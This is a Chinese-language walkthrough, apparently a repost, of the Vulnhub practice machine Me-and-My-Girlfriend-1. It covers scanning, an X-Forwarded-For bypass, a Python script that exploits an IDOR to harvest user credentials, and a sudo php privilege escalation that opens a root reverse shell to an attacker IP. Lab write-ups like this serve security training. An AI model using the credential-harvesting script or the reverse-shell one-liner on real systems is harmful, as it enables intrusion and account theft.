【Vulnhub】靶机Me-and-My-Girlfriend-1

admin
admin
admin
100990
文章
86
评论
2022年1月10日03:33:51评论45 views字数 1690阅读5分38秒阅读模式

前言

  • Vulnhub刷题简单记录

Me-and-My-Girlfriend-1

描述

描述:这个虚拟机告诉我们有一对恋人,爱丽丝和鲍勃,这对夫妇原本非常浪漫,但自从爱丽丝在一家私人公司“Ceban Corp”工作后,爱丽丝对鲍勃的态度发生了一些变化是“隐藏的”,Bob 请求您帮助获取 Alice 隐藏的内容并获得对公司的完全访问权限!

难度级别:初学者

注意:有 2 个标志文件

学习:Web 应用程序 | 简单的提权

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

Me-and-My-Girlfriend-1开始

1、可以用两种方法确认靶场的存在,扫ip

1
2
 
netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

1
 
nmap -sV -sC -A 192.168.1.108

3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况

1
2
3
 
gobuster dir -u http://192.168.1.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200

dirb http://192.168.1.104/

4、进入主页,发下必须改x-forwarded-for为本地地址,所以下个插件改为127.0.0.1来访问

image-20210925154409342

5、注册之后,发现有平行越权获取用户的账号和密码,写个脚本跑一波

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
 
# coding:utf-8
import re
import requests

def get_UserInfo(id):
    cookies = {
            "PHPSESSID":"ve33ic8l6hhrn6004ul1binas3"
        }
    headers = {
            "X-Forwarded-For": "127.0.0.1",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
        }
    res = requests.get("http://192.168.56.104/index.php?page=profile&user_id={}".format(id),headers=headers,cookies=cookies).text

    name = re.search("name\" value=\"(.*?)\">",res).group(1)
    username = re.search("rname\" value=\"(.*?)\">",res).group(1)
    password = re.search("word\" value=\"(.*?)\">",res).group(1)
    return name,username,password
for i in range(1,20):
    name,username,password = get_UserInfo(i)
    if name:
        print(username+":"+password)

获取了密码

6、经典的爆破密码

image-20210925155049538

1
2
3
4
5
6
7
 
eweuhtandingan:skuyatuh
aingmaung:qwerty!!!
sundatea:indONEsia
sedihaingmah:cedihhihihi
alice:4lic3
abdikasepak:dorrrrr
gylq:gylq

7、登陆,拿flag

image-20210925155324774

8、简单提权

1
 
sudo -l发现php是可以无密码使用root权限

反弹root权限

1
 
sudo /usr/bin/php -r '$sock=fsockopen("192.168.56.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");

image-20210925160619686

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:33:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Vulnhub】靶机Me-and-My-Girlfriend-1http://cn-sec.com/archives/730032.html

发表评论

匿名网友 填写信息